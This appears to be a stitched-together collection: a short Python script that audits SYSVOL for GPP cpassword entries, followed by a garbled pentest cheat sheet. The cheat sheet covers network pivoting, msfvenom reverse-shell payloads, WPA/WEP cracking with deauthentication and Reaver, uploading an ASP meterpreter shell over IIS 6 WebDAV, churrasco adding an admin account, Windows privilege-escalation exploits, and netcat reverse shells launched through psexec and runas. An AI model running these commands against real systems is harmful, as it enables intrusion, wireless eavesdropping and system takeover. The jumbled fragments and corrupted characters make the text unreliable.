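def find_cpassword_entries(sysvol_root):
    """Walk sysvol_root; return one finding per element carrying a cpassword
    attribute.  Unparseable GPP files are reported too, never silently skipped."""
    findings = []
    for dirpath, _dirs, files in os.walk(sysvol_root):
        for name in files:
            if name not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                findings.append({"file": path, "gpo": gpo_guid(path), "item": None,
                                 "account": None, "error": "unparseable XML"})
                continue
            # cpassword sits on <Properties>; the parent (<User>, <Task>, ...) names the item.
            parents = {c: p for p in tree.iter() for c in p}
            for elem in tree.iter():
                if "cpassword" not in elem.attrib:
                    continue
                item = elem.tag
                if item == "Properties" and elem in parents:
                    item = parents[elem].tag
                account = next((elem.attrib[a] for a in ACCOUNT_ATTRS
                                if a in elem.attrib), None)
                findings.append({"file": path, "gpo": gpo_guid(path), "item": item,
                                 "account": account, "error": None})
    return findings


# Constructed sample files; the cpassword values are placeholders, not ciphertext.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="LocalAdmin" image="2" changed="2015-05-06 10:00:00">
    <Properties action="U" userName="LocalAdmin" neverExpires="1"
                cpassword="PLACEHOLDER-NOT-REAL"/>
  </User>
</Groups>
"""
SAMPLE_TASKS_XML = """<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks>
  <Task name="NightlyBackup">
    <Properties action="C" runAs="svc_backup" logonType="Password"
                cpassword="PLACEHOLDER-NOT-REAL" appName="backup.exe"/>
  </Task>
</ScheduledTasks>
"""
SAMPLE_DRIVES_XML = """<?xml version="1.0" encoding="utf-8"?>
<Drives>
  <Drive name="H:">
    <Properties action="U" path="\\\\fileserver\\home" letter="H"/>
  </Drive>
</Drives>
"""

def build_sample_sysvol():
    """Write the constructed files into a temp dir laid out like SYSVOL."""
    root = tempfile.mkdtemp(prefix="sysvol_sample_")
    prefs = os.path.join(root, "example.local", "Policies",
                         "{11111111-2222-3333-4444-555555555555}", "Machine", "Preferences")
    for area, body in (("Groups", SAMPLE_GROUPS_XML), ("ScheduledTasks", SAMPLE_TASKS_XML),
                       ("Drives", SAMPLE_DRIVES_XML)):
        os.makedirs(os.path.join(prefs, area), exist_ok=True)
        with open(os.path.join(prefs, area, area + ".xml"), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    for hit in find_cpassword_entries(build_sample_sysvol()):
        print(hit["gpo"], hit["item"], hit["account"], hit["error"] or "", hit["file"])
```

Point find_cpassword_entries at a real SYSVOL copy (for example a mounted \\DC\SYSVOL share) to audit a domain; the clean Drives.xml in the sample shows that files without cpassword produce no finding.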
ENJOY❤️👍🏻
git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
PORT FORWARDING "port to port":
-Your own :
----MSF----
Most platforms
Forward:
Get meterpreter session on one of the dual homed machines
portfwd add -l 4445 -p 4443 -r 10.1.1.1
Use -R to make it reverse
----SSH----
For Linux
~C "if you already have an SSH session: press ~C at the start of a line to open the ssh command prompt, then enter the -R/-L option there"
-R 8081:172.24.0.2:80 (on my Kali machine listen on 8081, get it from 172.24.0.2:80)
<KALI 10.1.1.1>:8081<------------<REMOTE 172.24.0.2>:80
Now you can access 172.24.0.2:80, which you didn't have direct access to
-L 8083:127.0.0.1:8084 (on your machine listen on 8083, send it to my Kali machine on 8084)
<KALI 127.0.0.1>:8084<------------<REMOTE 10.1.1.230>:8083<------------<REMOTE X.X.X.X>:XXXX
run nc on port 8084, and if 10.1.1.230:8083 receives a reverse shell, you will get it
For reverse shell:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.1.1.230 LPORT=8083 -f elf -o shell
Run it on 2nd remote target to get a shell on Kali
Or if you didn't have an SSH session, then SSH to your Kali from target machine:
On Kali: service ssh start "add a user, give it /bin/false in /etc/passwd"
ssh -R 12345:192.168.122.228:5986 test@10.1.1.1
---PLINK----
Just like SSH, on Windows
service ssh start, and transfer /usr/share/windows-binaries/plink.exe to the target machine
On Target: plink.exe 10.1.1.1 -P 22 -C -N -L 0.0.0.0:4445:10.1.1.1:4443 -l KALIUSER -pw PASS
---SOCAT----
For linux
Forward your 8083 to 62.41.90.2:443
./socat TCP4-LISTEN:8083,fork TCP4:62.41.90.2:443
---CHISEL----
Most platforms
Remote static tunnels "port to port":
On Kali "reverse proxy listener":
./chisel server -p 8000 -reverse
General command:
./chisel client <YOUR IP>:<YOUR CHISEL SERVER PORT> L/R:YOUR LOCAL IP:<TUNNEL LISTENING PORT>:<TUNNEL TARGET>:<TUNNEL PORT>
Remote tunnels "access IP:PORT you couldn't access before":
On Target:
./chisel client 10.1.1.1:8000 R:127.0.0.1:8001:172.19.0.3:80
Local tunnels "listen on the target for something, and send it to us":
On Target:
./chisel client 10.1.1.1:8000 9001:127.0.0.1:8003
----------------------------------------------------------------------------------------
DYNAMIC "port to any":
setup proxychains with socks5 on 127.0.0.1:1080
Or set up socks5 proxy on firefox
For nmap use -Pn -sT or use tcp scanner in msf
----MSF----
Most platforms
Get meterpreter session on one of the dual homed machines
Auto route to 10.1.1.0 (multi/manage/autoroute)
Start socks proxy (auxiliary/server/socks4a)
(portscan once created route)
use auxiliary/scanner/portscan/tcp
set RHOSTS IP (the host you are pivoting onto, which was not part of the arp scan you ran)
(if a machine has port 80 or other web ports, to check it through our machine we have to create a port forward)
portfwd add -l 8001 -p 80 -r IP
(then go to 127.0.0.1:8001)
----SSH----
For Linux
-D 1080 (dynamic SOCKS proxy listening on 127.0.0.1:1080; add it to the ssh command line or via ~C)
---PLINK---
Just like SSH, on Windows
On Target: plink.exe 10.1.1.1 -P 22 -C -N -D 1080 -l KALIUSER -pw PASS
---CHISEL----
Most platforms
On Kali:
./chisel server -p 8000 -reverse
On Target:
./chisel client 10.1.1.1:8000 R:8001:127.0.0.1:1080
./chisel server -p 8001 --socks5
On Kali:
./chisel client 127.0.0.1:8001 socks
WPA2 PSK attack with aircrack-ng suite.
#TipsForBeginners
ifconfig wlan1 # check wireless IFace
sudo airmon-ng check kill # kill issue causing processes
sudo airmon-ng start wlan1 # start monitor mode
sudo airodump-ng wlan1mon # start capturing
sudo airodump-ng --bssid 64:66:B3:6E:B0:8A -c 11 wlan1mon -w output
sudo aireplay-ng --deauth 5 -a 64:66:B3:6E:B0:8A wlan1mon # deauthenticate the client
sudo aircrack-ng output-01.cap dict # crack the passphrase
WPA PSK attack with aircrack-ng suite.
--------------------------------------
Place your wireless card into Monitor Mode
airmon-ng start wlan0
Detect all available wireless APs and clients
airodump-ng mon0
Setting adapter channel
iwconfig mon0 channel <channelnumber>
Capturing the four-way handshake
airodump-ng --channel <channelnumber> --bssid <bssid> --write capture mon0
You can capture the handshake passively (it takes time) or de-authenticate a client.
De-authentication attack
aireplay-ng --deauth 3 -a <BSSID> -c <clientmac> mon0
Deauth every client - aireplay-ng -0 5 -a <bssid> mon0
Dictionary Attack
aircrack-ng -w passwords.lst capture-01.cap
Brute force Attack
crunch 8 8 0123456789 | aircrack-ng -e "Name of Wireless Network" -w - /root/home/wpa2.eapol.cap
WEP attack with aircrack-ng suite.
----------------------------------
Place your wireless card into Monitor Mode
airmon-ng start wlan0
Detect all available wireless APs and clients
airodump-ng mon0
Setting adapter channel
iwconfig mon0 channel <channelnumber>
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
aircrack-ng -b (bssid) (file name-01.cap)
Rogue Access Point Testing
--------------------------
# ifconfig wlan0 down
# iw reg set BO
# iwconfig wlan0 txpower 0
# ifconfig wlan0 up
# airmon-ng start wlan0
# airodump-ng --write capture mon0
root@backbox:/home/backbox# ifconfig wlan1 down
root@backbox:/home/backbox# iw reg set BO
root@backbox:/home/backbox# ifconfig wlan1 up
root@backbox:/home/backbox# iwconfig wlan1 channel 13
root@backbox:/home/backbox# iwconfig wlan1 txpower 30
root@backbox:/home/backbox# iwconfig wlan1 rate 11M auto
Reaver
------
airmon-ng start wlan0
airodump-ng wlan0
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -S --no-nacks -d7 -vv -c 1
Pixie WPS
---------
airmon-ng check
airmon-ng start wlan0
airodump-ng wlan0mon --wps
reaver -i wlan0mon -c 11 -b 00:00:00:00:00:00 -K 1
Wireless Notes
--------------
Wired Equivalent Privacy (WEP)
RC4 stream cipher w/ CRC32 for integrity check
- Attack:
By sniffing an ARP packet, then replaying it to get many encrypted replies with different IVs.
- Remediation:
Use WPA2
Wifi Protected Access (WPA)
Temporal Key Integrity Protocol (TKIP) Message Integrity Check
- Attack:
Uses a four-way handshake, and if that handshake can be captured, then a dictionary attack can be mounted to find the Pairwise Master Key for the Access Point and client Station.
- Remediation:
Use long-keys
Wifi Protected Access 2 (WPA2)
Advanced Encryption Standard (AES)
- Attack:
Uses a four-way handshake, and if that handshake can be captured, then a dictionary attack can be mounted to find the Pairwise Master Key for the Access Point and client Station.
- Remediation:
WPA-Enterprise
WIRELESS ANTENNA: ALL YOU NEED IS TO HIT UP THOSE COMMANDS ON YOUR TERMINAL :)
- #Wifihacking
Open the Monitor Mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
Increase Wi-Fi TX Power
root@uceka:~# iw reg set BO
root@uceka:~# iwconfig wlan0 txpower <NmW|NdBm|off|auto>
# txpower is 30 (generally)
# the allowed txpower depends on your country's regulatory domain, look it up first
root@uceka:~# iwconfig
Change WiFi Channel
root@uceka:~# iwconfig wlan0 channel <SetChannel(1-14)>
WEP CRACKING
Method 1 : Fake Authentication Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
# What's my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> wlan0mon
root@uceka:~# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aircrack-ng -b <BSSID> <PCAP_of_FileName>
Method 2 : ARP Replay Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
# What's my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -3 -x 1000 -n 1000 -b <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aircrack-ng -b <BSSID> <PCAP_of_FileName>
Method 3 : Chop Chop Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
# What's my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aireplay-ng -4 -b <BSSID> -h <OurMac> wlan0mon
# Press 'y'
root@uceka:~# packetforge-ng -0 -a <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
root@uceka:~# aireplay-ng -2 -r <FileName2> wlan0mon
root@uceka:~# aircrack-ng <PCAP_of_FileName>
Method 4 : Fragmentation Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
# What's my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aireplay-ng -5 -b <BSSID> -h <OurMac> wlan0mon
# Press 'y'
root@uceka:~# packetforge-ng -0 -a <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
root@uceka:~# aireplay-ng -2 -r <FileName2> wlan0mon
root@uceka:~# aircrack-ng <PCAP_of_FileName>
Method 5 : SKA (Shared Key Authentication) Type Cracking
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@uceka:~# aireplay-ng -0 10 -a <BSSID> -c <VictimMac> wlan0mon
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# macchanger --mac <VictimMac> wlan0mon
root@uceka:~# ifconfig wlan0mon up
root@uceka:~# aireplay-ng -3 -b <BSSID> -h <FakedMac> wlan0mon
root@uceka:~# aireplay-ng --deauth 1 -a <BSSID> -h <FakedMac> wlan0mon
root@uceka:~# aircrack-ng <PCAP_of_FileName>
GM328A reverse engineering, new firmware and Tetris!.pdf (4.9 MB) - reverse engineering tutorial
SOME Windows TRICKS:
Windows Privilege Escalation resource
http://www.fuzzysecurity.com/tutorials/16.html
Try the getsystem command using meterpreter - rarely works but is worth a try.
meterpreter > getsystem
Metasploit Meterpreter Privilege Escalation Guide: https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/
Windows Server 2003 and IIS 6.0 WEBDAV Exploiting
http://www.r00tsec.com/2011/09/exploiting-microsoft-iis-version-60.html
msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=443 -f asp > aspshell.txt
cadaver http://$ip
dav:/> put aspshell.txt
Uploading aspshell.txt to `/aspshell.txt':
Progress: [=============================>] 100.0% of 38468 bytes succeeded.
dav:/> copy aspshell.txt aspshell3.asp;.txt
Copying `/aspshell3.txt' to `/aspshell3.asp%3b.txt': succeeded.
dav:/> exit
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 1.2.3.4
msf exploit(handler) > set LPORT 443
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit -j
curl http://$ip/aspshell3.asp;.txt
* Started reverse TCP handler on 1.2.3.4:443
* Starting the payload handler...
* Sending stage (957487 bytes) to 1.2.3.5
* Meterpreter session 1 opened (1.2.3.4:443 -> 1.2.3.5:1063) at 2017-09-25 13:10:55 -0700
Windows privilege escalation exploits are often written in Python, so it is necessary to compile them into an executable using pyinstaller.py and upload them to the remote server.
pip install pyinstaller
wget -O exploit.py http://www.exploit-db.com/download/31853
python pyinstaller.py --onefile exploit.py
Windows Server 2003 and IIS 6.0 privilege escalation using impersonation:
https://www.exploit-db.com/exploits/6705/
https://github.com/Re4son/Churrasco
c:\Inetpub>churrasco
churrasco
/churrasco/-->Usage: Churrasco.exe -d "command to run"
c:\Inetpub>churrasco -d "net user /add <username> <password>"
c:\Inetpub>churrasco -d "net localgroup administrators <username> /add"
c:\Inetpub>churrasco -d "NET LOCALGROUP "Remote Desktop Users" <username> /ADD"
Windows MS11-080 - http://www.exploit-db.com/exploits/18176/
python pyinstaller.py --onefile ms11-080.py
ms11-080.exe -O XP
Powershell Exploits - You may find that some Windows privilege escalation exploits are written in PowerShell. You may not have an interactive shell that allows you to enter the PowerShell prompt. Once the PowerShell script is uploaded to the server, here is a quick one-liner to run a PowerShell command from a basic (cmd.exe) shell:
MS16-032 https://www.exploit-db.com/exploits/39719/
powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Public\Invoke-MS16-032.ps1; Invoke-MS16-032 }"
Powershell Priv Escalation Tools: https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
Windows Run As - Switching users in Linux is trivial with the su command. However, an equivalent command does not exist in Windows. Here are 3 ways to run a command as a different user in Windows.
Sysinternals psexec is a handy tool for running a command on a remote or local server as a specific user, given you have their username and password. The following example creates a reverse shell from a Windows server to our Kali box using netcat for Windows and PsExec (on a 64-bit system).
C:\>psexec64 \\COMPUTERNAME -u Test -p test -h "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
Runas.exe is a handy Windows tool that allows you to run a program as another user so long as you know their password. The following example creates a reverse shell from a Windows server to our Kali box using netcat for Windows and Runas.exe:
C:\>C:\Windows\System32\runas.exe /env /noprofile /user:Test "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"
Enter the password for Test:
Attempting to start nc.exe as user "COMPUTERNAME\Test" ...
Top Windows 10 Public CVEs & Bugs:
CVE-2015-1769 MS15-085 - Vulnerability in Mount Manager - Could Allow Elevation of Privilege
CVE-2015-2426 ms15_078_atmfd_bof MS15-078 - exploits a pool based buffer overflow in the atmfd.dll driver
CVE-2015-2479 MS15-092 - Vulnerabilities in .NET Framework - Allows Elevation of Privilege
CVE-2015-2513 MS15-098 - Vulnerabilities in Windows Journal - Could Allow Remote Code Execution
CVE-2015-2423 MS15-088 - Unsafe Command Line Parameter Passing - Could Allow Information Disclosure
CVE-2015-2431 MS15-080 - Vulnerabilities in Microsoft Graphics Component - Could Allow Remote Code Execution
CVE-2015-2441 MS15-091 - Vulnerabilities exist when Microsoft Edge improperly accesses objects in memory - allows remote code execution
CVE-2015-0057 exploits GUI component of Windows namely the scrollbar element - allows complete control of a Windows machine